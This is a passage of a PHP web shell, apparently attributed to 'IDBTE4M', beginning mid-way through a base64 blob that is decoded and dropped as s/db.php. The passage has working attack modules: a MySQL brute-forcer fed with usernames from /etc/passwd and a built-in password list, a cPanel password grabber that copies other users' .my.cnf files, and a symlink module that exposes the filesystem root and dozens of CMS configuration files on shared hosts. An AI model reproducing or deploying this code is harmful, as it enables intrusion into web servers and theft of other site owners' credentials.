zaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyA/Pg==";
1953. $write = fwrite($f2, base64_decode($sml_db));
1954. if ($write) {
1955. @chmod('s/db.php', 0755);
1956. }
1957. echo "</br></br><center><b>GO TO : <a href='s/db.php' target='_blank'>[+] MYSQL MANAGER [+]</a></center></br>";
1958. }
1959. }
1960. ?>
1961. <?php
1962. if (isset($_GET['jak']) && ($_GET['jak'] == 'brute')) { ?>
1963. <form action="?jak=brute" method="post">
1964. <?php ?>
1965. <html>
1966. <head>
1967. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
1968. <body text="#4C83AF" bgcolor="#111111" font="Verdana, Arial, Helvetica, sans-serif">
1969. <center>
1970. <form method="POST">
1971. <strong>
1972. <input name="page" type="hidden" value="find">                     
1973. </strong>
1974.         <div style="width:90%">
1975.  
1976. <div id="result">
1977. <br /><br />
1978. </div>
1979.             <div id="mp" style="width:49%;float:left">
1980.                 <b>~ UserName ~</b>
1981.             </div>
1982.             <div id="mp" style="width:49%;float:left">
1983.  
1984.                 <b>~ PassWord ~</b>
1985.             </div>
1986.             <div id="mp" style="clear:both;width:49%;float:left">
1987.                 <textarea rows="10" class="coode" style="width:100%" name="usernames"><? if($_POST['page']=='find' && $_POST['usernames']<=''){$lines=@file("/etc/passwd");foreach($lines as $nr=>$val){$str=explode(":",$val);echo $str[0]."
1988. ";}}else{echo $_POST['usernames'];} ?></textarea>
1989.             </div>
1990.             <div id="s" style="width:2%;float:left">
1991. &nbsp;&nbsp;
1992.             </div>
1993.             <div id="s" style="width:49%;float:left">
1994.                 <textarea rows="10" class="coode" style="width:100%" name="passwords"><? if($_POST['page']=='find' && $_POST['passwords']<=''){echo "123
1995. 1234
1996. 12345
1997. 123456
1998. 1234567
1999. 12345678
2000. 123456789
2001. 1234567890
2002. Password
2003. pass
2004. admin
2005. admin123
2006. admin1234
2007. admin12345
2008. admin123456
2009. admin1234567
2010. admin12345678
2011. admin123456789
2012. admin1234567890
2013. administrator123
2014. administrator1234
2015. administrator12345
2016. administrator123456
2017. administrator1234567
2018. administrator12345678
2019. administrator123456789
2020. administrator1234567890
2021. password123
2022. password1234
2023. password12345
2024. password123456
2025. password1234567
2026. password12345678
2027. password123456789
2028. password1234567890
2029. 123456
2030. 123123
2031. 1234
2032. 12345
2033. 12369874
2034. 123456789
2035. 112233
2036. 12345678
2037. 123654
2038. 123654789
2039. 1234admin
2040. password
2041. passwd1
2042. password123
2043. test123
2044. 159357
2045. 147258
2046. 159951
2047. 123321
2048. ADMIN
2049. 195159
2050. 147852
2051. Admin
2052. Administrator
2053. Demo
2054. User
2055. user
2056. useruser
2057. 987456321
2058. 741852
2059. 321987
2060. 357159
2061. 1234566
2062. 1234567899
2063. 111222
2064. Administrateur
2065. administrateur
2066. 0123456
2067. 0123456789
2068. 0147258
2069. 147258
2070. 987654
2071. 963852
2072. 369258
2073. 456789
2074. 456321
2075. 456123
2076. ADMIN1234
2077. Admin1234
2078. admin123456
2079. admin1234
2080. admin01234
2081. 000000
2082. 142536
2083. 632541
2084. "; }else{echo $_POST['passwords'];} ?></textarea>
2085.  
2086.             </div>
2087.         </div>
2088.         <div style="width:90%;clear:both">
2089.         <br><p><input type="submit" name="submit" class="inputzbut" value="Go !" style="width:120px;height:30px;" /></p>
2090.         </div>
2091.         <br /><br /><br />
2092.  
2093. </form>
2094.  
2095.  
2096. <?
2097. if($_POST['page']=='find')
2098. {
2099. echo"<div id='result'>";
2100. if(isset($_POST['usernames']) && isset($_POST['passwords']))
2101. {
2102.  
2103.     $a1 = explode("
2104. ",$_POST['usernames']);
2105.     $a2 = explode("
2106. ",$_POST['passwords']);
2107.     $id2 = count($a2);
2108.     $ok = 0;
2109.     foreach($a1 as $user )
2110.     {
2111.         if($user !== '')
2112.         {
2113.         $user=trim($user);
2114.          for($i=0;$i<=$id2;$i++)
2115.          {
2116.             $pass = trim($a2[$i]);
2117.             if(@mysql_connect('localhost',$user,$pass))
2118.             {
2119.             if($pass !== ''){
2120.                 echo "<b>[ IDBTE4M ]=> </b> <b>User[<font color='green'> $user </font>] Pass[<font color='green'> $pass </font>]</b><br>";
2121.            $ok++;
2122.             }}
2123.          }
2124.         }
2125.     }
2126.     echo "<hr><b>You Found <font color=green>$ok</font>BY IDBTE4M</b>";
2127.     exit;
2128. }
2129. echo'</div>';
2130. }
2131. }
2132. ?>
2133.  
2134. <?php
2135. if (isset($_GET['jak']) && ($_GET['jak'] == 'cp')) {
2136. ?>
2137. <form action="?&amp;jak=cp" method="post">
2138. <?php
2139. /**
2140.  * @author: FaisaL Ahmed aka blue X
2141.  * @mail: me@faialahmed.me
2142.  * @Screenshot: http://prntscr.com/7c1p34
2143.  * @Last Updated: 01 June 2015
2144. */
2145.  
2146. @ini_set('display_errors',0);
2147. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
2148.     $ar0=explode($marqueurDebutLien, $text);
2149.     $ar1=explode($marqueurFinLien, $ar0[$i]);
2150.     return trim($ar1[0]);
2151. }
2152. echo "<center>";
2153. $d0mains = @file('/etc/named.conf');
2154. $domains = scandir("/var/named");
2155.  
2156. if ($domains or $d0mains)
2157. {
2158.     $domains = scandir("/var/named");
2159.     if($domains) {
2160. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
2161. $count=1;
2162. $dc = 0;
2163. $list = scandir("/var/named");
2164. foreach($list as $domain){
2165. if(strpos($domain,".db")){
2166. $domain = str_replace('.db','',$domain);
2167. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2168. $dirz = '/home/'.$owner['name'].'/.my.cnf';
2169. $path = getcwd();
2170.  
2171. if (is_readable($dirz)) {
2172. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
2173. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
2174. $password=entre2v2($p,'password="','"');
2175. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
2176. $dc++;
2177. }
2178.  
2179. }
2180. }
2181. echo '</table>';
2182. $total = $dc;
2183. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
2184. echo '</center>';
2185. }else{
2186. $d0mains = @file('/etc/named.conf');
2187.     if($d0mains) {
2188. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
2189. $count=1;
2190. $dc = 0;
2191. $mck = array();
2192. foreach($d0mains as $d0main){
2193.     if(@eregi('zone',$d0main)){
2194.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
2195.         flush();
2196.         if(strlen(trim($domain[1][0])) >2){
2197.             $mck[] = $domain[1][0];
2198.         }
2199.     }
2200. }
2201. $mck = array_unique($mck);
2202. $usr = array();
2203. $dmn = array();
2204. foreach($mck as $o) {
2205.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
2206.     $usr[] = $infos['name'];
2207.     $dmn[] = $o;
2208. }
2209. array_multisort($usr,$dmn);
2210. $dt = file('/etc/passwd');
2211. $passwd = array();
2212. foreach($dt as $d) {
2213.     $r = explode(':',$d);
2214.     if(strpos($r[5],'home')) {
2215.         $passwd[$r[0]] = $r[5];
2216.     }
2217. }
2218. $l=0;
2219. $j=1;
2220. foreach($usr as $r) {
2221. $dirz = '/home/'.$r.'/.my.cnf';
2222. $path = getcwd();
2223. if (is_readable($dirz)) {
2224. copy($dirz, ''.$path.'/'.$r.'.txt');
2225. $p=file_get_contents(''.$path.'/'.$r.'.txt');
2226. $password=entre2v2($p,'password="','"');
2227. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
2228. $dc++;
2229.                 flush();
2230.                 $l=$l?0:1;
2231.                 $j++;
2232.                                 }
2233.             }
2234.                         }
2235. echo '</table>';
2236. $total = $dc;
2237. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
2238. echo '</center>';
2239.  
2240. }
2241. }else{
2242. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
2243. }
2244.  
2245. echo "</body></html>";
2246. }
2247. ?>
2248. <?php
2249. if (isset($_GET['jak']) && ($_GET['jak'] == 'sym')) {
2250. ?>
2251. <form action="?path=<?php echo $path; ?>&amp;jak=sym" method="post">
2252.     <center><h2>Domain Viewer</h2></center><br><br>
2253.     <?php
2254.     function openBaseDir()
2255. {
2256. $openBaseDir = ini_get("open_basedir");
2257. if (!$openBaseDir)
2258.     {
2259.         $openBaseDir = '<font color="green">OFF</font>';
2260.     }
2261.     else
2262.     {
2263.         $openBaseDir = '<font color="red">ON</font>';
2264.     }    
2265.     return $openBaseDir;
2266. }
2267.  
2268.  
2269. echo '
2270.    <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
2271.    <td height="100" align="left" class="td1">';
2272.     $pg = basename(__FILE__);
2273.     $safe_mode = @ini_get('safe_mode');
2274.     $dir = @getcwd();
2275.     ////////////////////////////////////////////////////
2276.     // LET'S PLAY ~
2277.     ##.htaccess
2278. @mkdir('jaks',0777);
2279. @symlink("/","jaks/!");
2280. $htaccss = "Options Indexes FollowSymLinks\nDirectoryIndex amis.txt\nAddType txt .php\nAddHandler txt .php";
2281.  
2282. file_put_contents("jaks/.htaccess",$htaccss);
2283. $etc = file_get_contents("/etc/passwd");
2284. $etcz = explode("\n",$etc);
2285.  
2286.  
2287. ##Symlink to the ROOT :p
2288. foreach($etcz as $etz){
2289. $etcc = explode(":",$etz);
2290. error_reporting(0);
2291.  
2292. $current_dir = posix_getcwd();
2293. $dir = explode("/",$current_dir);
2294.  
2295. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2296. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2297. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2298. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2299. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
2300. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
2301. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2302. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2303. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2304. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2305. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
2306. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
2307. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
2308. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
2309. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
2310. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
2311. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
2312. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2313. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2314. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2315. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2316. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2317. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2318. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2319. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2320. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2321. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2322. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2323. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2324. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2325. }
2326. #############################
2327.    if(is_readable("/var/named")){
2328.     echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2329.     echo'<tr><td><center><b>SITE</b></center></td><td>
2330.    <center><b>USER</b></center></td>
2331.    <td></center><b>SYMLINK</b></center></td>';
2332.     $list = scandir("/var/named");
2333.     foreach($list as $domain){
2334.     if(strpos($domain,".db")){
2335.     $i += 1;
2336.     $domain = str_replace('.db','',$domain);
2337.     $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2338.  
2339.     echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
2340.    <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
2341.    <td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2342.         }
2343.     }
2344.     echo "<center>Total Domains Found: ".$i."</center><br />";
2345.     }else{
2346.     echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
2347.  
2348. break;
2349.  
2350. ##################################
2351. error_reporting(0);
2352. $etc = file_get_contents("/etc/passwd");
2353. $etcz = explode("\n",$etc);
2354. if(is_readable("/etc/passwd")){
2355.  
2356. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2357. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
2358.  
2359. $list = scandir("/var/named");
2360.  
2361. foreach($etcz as $etz){
2362. $etcc = explode(":",$etz);
2363.  
2364. foreach($list as $domain){
2365. if(strpos($domain,".db")){
2366. $domain = str_replace('.db','',$domain);
2367. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2368. if($owner['name'] == $etcc[0])
2369. {
2370. $i += 1;
2371. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
2372. <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
